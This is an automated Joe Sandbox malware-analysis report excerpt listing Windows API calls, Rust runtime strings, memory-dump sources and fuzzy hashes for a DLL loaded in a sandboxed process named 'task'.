                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$s<unknown>
                                                                                                                                                                • API String ID: 724789610-600858821
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 6C9051F6
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C9051C9
                                                                                                                                                                • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 6C905194, 6C9051A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                                                                                                                • API String ID: 0-1711242015
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C8F52C3,00000000,?,00000001,?,?,?,6C8F53B2,00000001,FlsFree,6C911940,FlsFree), ref: 6C8F531F
                                                                                                                                                                • GetLastError.KERNEL32(?,6C8F52C3,00000000,?,00000001,?,?,?,6C8F53B2,00000001,FlsFree,6C911940,FlsFree,00000000,?,6C8F4234), ref: 6C8F5329
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C8F5351
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32), ref: 6C8DE428
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6C8DE438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: SetThreadDescription$kernel32
                                                                                                                                                                • API String ID: 1646373207-1950310818
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6C8E03BE
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6C8E03E2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6C8E0440
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E04A1
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E04C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: b3032c63bfdd7423a4f05fd7165f6a757cf4a755f1f45097f24dce9a7900d3d2
                                                                                                                                                                • Instruction ID: d41fa59438f7ddd08ee20227c983991f9566539cef473043e3f51d1f2f69fc31
                                                                                                                                                                • Opcode Fuzzy Hash: b3032c63bfdd7423a4f05fd7165f6a757cf4a755f1f45097f24dce9a7900d3d2
                                                                                                                                                                • Instruction Fuzzy Hash: 7641E6B1B442448BDB208F64DA44BAB77B5BB4B31DF140D2CE809E7B81DB70D944DB61
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6C8E057E
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6C8E05A2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6C8E0600
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E0661
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E0683
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 6637edfc8574e59bb87585fbe1ae8ee90f35949940be887c1a87be0d65b27cee
                                                                                                                                                                • Instruction ID: d9218860e400289bd4b268fc755529606826d49eac50e2538c2c5e3fe4e9c2dd
                                                                                                                                                                • Opcode Fuzzy Hash: 6637edfc8574e59bb87585fbe1ae8ee90f35949940be887c1a87be0d65b27cee
                                                                                                                                                                • Instruction Fuzzy Hash: 324109B1A453449BDB208FA4C944B9A77B4BB8B715F140D2CD409E7B91DF71DD40DB90
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,00000000,?,00000004,00000010,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E0292
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,00000010,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E02B8
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E02CE
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E030D
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E0348
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: f9c3930c6c67627ffe7f0b263922182ec2d3f120c683ca58cbd8f5c80017832f
                                                                                                                                                                • Instruction ID: c57989eada6502f60c1767ef057052017d77fdd6f0a1e593e6a33dc8512a77a2
                                                                                                                                                                • Opcode Fuzzy Hash: f9c3930c6c67627ffe7f0b263922182ec2d3f120c683ca58cbd8f5c80017832f
                                                                                                                                                                • Instruction Fuzzy Hash: 30217DB57492805FEB2143B9A9C8B6537E9A79731AF184C6DF449CBA81DF70C444D321
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(425D10BB,00000000,00000000,?), ref: 6C8FCC67
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C8FCEB9
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C8FCEFF
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8FCFA2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                • Opcode ID: 9252412824798a3b8a0ccc8f1dc9be0398095e24a1ece0dc548d7b3b3f57d186
                                                                                                                                                                • Instruction ID: f41662255cda539f48fef256f0aae483f7efb06bc2e3904c010b9d20ea4d8147
                                                                                                                                                                • Opcode Fuzzy Hash: 9252412824798a3b8a0ccc8f1dc9be0398095e24a1ece0dc548d7b3b3f57d186
                                                                                                                                                                • Instruction Fuzzy Hash: 8ED17B75E042489FDB20DFA8C980ADDFBB4FF09354F24452AE426EB742D730AA46CB50
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                • Opcode ID: e9f3824a28fc3c1b8f96f3b68ae9f0dd03de741f7f1844cd53bfe6766071a840
                                                                                                                                                                • Instruction ID: f80d7d0928fea99174eeb423de2531ab67269cdb96e56565abc6227f86aa1d8c
                                                                                                                                                                • Opcode Fuzzy Hash: e9f3824a28fc3c1b8f96f3b68ae9f0dd03de741f7f1844cd53bfe6766071a840
                                                                                                                                                                • Instruction Fuzzy Hash: 51519E716066069FEB258E54DB40FA977B4FBC4398F200D2ED97547E90E771E842CA90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8FAEE5
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6C8FAEEC
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6C8FAF26
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6C8FAF2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                • Opcode ID: bbb8d84189e8bad83fdf37b16dbd6adb07674fe5337aa6401fec416ea19ba623
                                                                                                                                                                • Instruction ID: 97523441af07f8140e5ba471b307b9d1d19e7a351f748fc032eb9b2e190332b9
                                                                                                                                                                • Opcode Fuzzy Hash: bbb8d84189e8bad83fdf37b16dbd6adb07674fe5337aa6401fec416ea19ba623
                                                                                                                                                                • Instruction Fuzzy Hash: 3221B671604205AF9B309F6ACA809ABB7B9FF063FC7048D29E834D7A40D735EC528760
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6C8FC321
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C8FC359
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C8FC379
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8DD873
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6C8DD87F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD896
                                                                                                                                                                • CloseHandle.KERNEL32(6C8E0A90), ref: 6C8DD906
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1454876536-0
                                                                                                                                                                APIs
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000), ref: 6C9021FA
                                                                                                                                                                • GetLastError.KERNEL32(?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?,?,?,6C8FD599,00000000), ref: 6C902206
                                                                                                                                                                  • Part of subcall function 6C9021CC: CloseHandle.KERNEL32(FFFFFFFE,6C902216,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?,?), ref: 6C9021DC
                                                                                                                                                                • ___initconout.LIBCMT ref: 6C902216
                                                                                                                                                                  • Part of subcall function 6C90218E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9021BD,6C901681,?,?,6C8FCFF6,?,00000000,00000000,?), ref: 6C9021A1
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?), ref: 6C90222B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                Strings
                                                                                                                                                                • Box<dyn Any><unnamed>, xrefs: 6C8DA432
                                                                                                                                                                • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 6C8DA6D9, 6C8DA713, 6C8DA732
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                                                                                                                                • API String ID: 0-3513654867
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6C8F4860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                APIs
                                                                                                                                                                • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6C8DAFD9,?,00000004,000000FF,6C8E0A00,FFFFFFFF,?,?,6C8DAFD9,6C933BF4), ref: 6C9052BB
                                                                                                                                                                • GetLastError.KERNEL32(?,6C8DAFD9,6C933BF4), ref: 6C9052C2
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C905313
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastWait
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                • API String ID: 1574541344-1397593039
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6C8F913E
                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 6C8F9150
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                • String ID: <V
                                                                                                                                                                • API String ID: 3000768030-365566370
                                                                                                                                                                • Opcode ID: 7765099ce730ed40bfb232747cff9a5b6a7ab4cb7771746017d0631edf735edb
                                                                                                                                                                • Instruction ID: 2e1fa47c6ad230af8619d877d92f47e8f3b6b5f0764e5497d2201caff4e575c9
                                                                                                                                                                • Opcode Fuzzy Hash: 7765099ce730ed40bfb232747cff9a5b6a7ab4cb7771746017d0631edf735edb
                                                                                                                                                                • Instruction Fuzzy Hash: 6B11A5216087514ADB304D3F8E8CA12BBA5A7932B4B340F2DD5BA869E1D738D4D7C541
                                                                                                                                                                APIs
                                                                                                                                                                • _fwprintf.LIBCONCRTD ref: 6C8EDCC4
                                                                                                                                                                  • Part of subcall function 6C8EDF70: _fread.LIBCMTD ref: 6C8EDF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
